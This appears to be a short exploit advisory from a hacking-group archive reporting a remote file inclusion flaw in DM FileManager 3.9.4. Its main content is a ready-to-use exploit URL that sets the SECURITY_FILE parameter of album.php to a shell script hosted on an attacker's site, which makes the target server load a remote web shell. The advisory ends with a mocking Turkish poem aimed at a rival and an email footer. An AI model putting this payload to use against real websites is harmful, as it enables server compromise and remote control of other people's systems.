DM FileManager version 3.9.4 suffers from a remote file inclusion vulnerability.
ce6564f07bda2554baf6e402683e01bee39f882a6de6353cc85afcfd63391e41
#############################################################################################
[+] DM FileManager 3.9.4 Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://uploaded.to/file/3z84ie
[+] Product Site : http://www.dutchmonkey.com
#############################################################################################
[+] EXPLOIT;> [+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördüðüm En hýyar Lamersin :D
Bu Kafiyelerde Bi Tarafýna Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >
_________________________________________________________________
Windows Live tüm arkadaþlarýnýzla tek bir yerden iletiþim kurmanýza yardýmcý olur.
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx